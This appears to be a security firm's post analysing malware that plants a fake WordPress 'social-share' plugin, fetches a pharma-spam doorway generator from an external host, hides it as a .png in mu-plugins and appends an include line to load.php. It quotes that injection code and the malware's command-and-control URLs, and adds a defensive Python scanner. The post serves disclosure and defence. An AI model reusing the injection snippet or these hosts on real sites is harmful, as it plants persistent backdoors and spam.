We found infected sites where malware created a fake WordPress plugin that generated pharma spam doorways.
Path: wp-content/plugins/social-share/wp-social-share.php
This file creates wp-content/plugins/social-share/share.php, which calls itself "WP Social Include File". It downloads a doorway generator from hxxp://api-linux . net/json/json_01.txt, writes it to wp-content/mu-plugins/mu-plugin.png and then appends a line to the bottom of wp-includes/load.php that includes this file:
...
$load = '@include_once ( ABSPATH . \'wp-content/mu-plugins/mu-plugin.png\' );';
if(strpos(@file_get_contents($path."/../wp-includes/load.php"), $load) === false){
@file_put_contents($path."/../wp-includes/load.php", $load, FILE_APPEND);}
...
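A defender's check for this injection, added here as an example and not part of the original post: it flags any ABSPATH-relative include in wp-includes/load.php whose target is not a .php file, and any file under wp-content/mu-plugins that lacks a .php extension but begins with a PHP open tag. The regex and the constructed sample install it scans are assumptions, not code from the malware or from WordPress.

```python
import os
import re
import tempfile

# Assumed pattern: an include/require of a path relative to ABSPATH, shaped like
# the line the dropper appends to load.php. Not taken from the malware itself.
INCLUDE_RE = re.compile(
    r"@?(?:include|require)(?:_once)?\s*\(?\s*ABSPATH\s*\.\s*['\"]([^'\"]+)['\"]",
    re.IGNORECASE,
)

def suspicious_includes(php_source):
    """Return ABSPATH-relative include targets that are not .php files."""
    return [t for t in INCLUDE_RE.findall(php_source) if not t.lower().endswith(".php")]

def php_in_non_php_files(directory):
    """Return files under directory without a .php extension that start with a PHP tag."""
    found = []
    for dirpath, _, names in os.walk(directory):
        for name in names:
            if name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                head = fh.read(64)
            if head.lstrip().startswith(b"<?"):
                found.append(os.path.relpath(path, directory))
    return sorted(found)

def scan_wordpress(root):
    """Run both checks against a WordPress install rooted at `root`."""
    with open(os.path.join(root, "wp-includes", "load.php"), encoding="utf-8", errors="replace") as fh:
        includes = suspicious_includes(fh.read())
    mu_dir = os.path.join(root, "wp-content", "mu-plugins")
    disguised = php_in_non_php_files(mu_dir) if os.path.isdir(mu_dir) else []
    return {"load_php_includes": includes, "disguised_php": disguised}

def build_sample_install():
    """Constructed sample: a minimal WordPress tree showing the same injection."""
    root = tempfile.mkdtemp(prefix="wp-sample-")
    os.makedirs(os.path.join(root, "wp-includes"))
    os.makedirs(os.path.join(root, "wp-content", "mu-plugins"))
    with open(os.path.join(root, "wp-includes", "load.php"), "w") as fh:
        fh.write("<?php\n// ... genuine core code ...\n")
        fh.write("@include_once ( ABSPATH . 'wp-content/mu-plugins/mu-plugin.png' );")
    with open(os.path.join(root, "wp-content", "mu-plugins", "mu-plugin.png"), "w") as fh:
        fh.write("<?php /* constructed stand-in for the doorway generator */ ?>")
    with open(os.path.join(root, "wp-content", "mu-plugins", "real.png"), "wb") as fh:
        fh.write(b"\x89PNG\r\n\x1a\n")  # a genuine image header, must not be flagged
    return root

if __name__ == "__main__":
    print(scan_wordpress(build_sample_install()))
```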
The doorway generator uses the following URLs:
...
$processor = 'jp.apigenerator.net';
$server_door = 'hxxp://'.$processor.'/avtonom/comeon_door.php';
$url_new = $processor;
$path_new = '/avtonom/comeon_door.php';
$buypage = 'hxxp://solarkey .net/notds/gettheme_ss_incl.php';
$buy_url = 'solarkey.net';
$buy_path = '/notds/gettheme_ss_incl.php';
...
$linksurl = 'http://jp.apigenerator.net/avtonom/getlinks_003.php';
$linksurl_url = 'jp.apigenerator.net';
$linksurl_path = '/avtonom/getlinks_003.php';
...
Some of the above URLs are only requested with a special User-Agent string:
$useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6";
If you are a hosting provider, we recommend blocking HTTP requests to these external sites, to stop the spam doorways from being distributed. We will share more details as we learn more about it.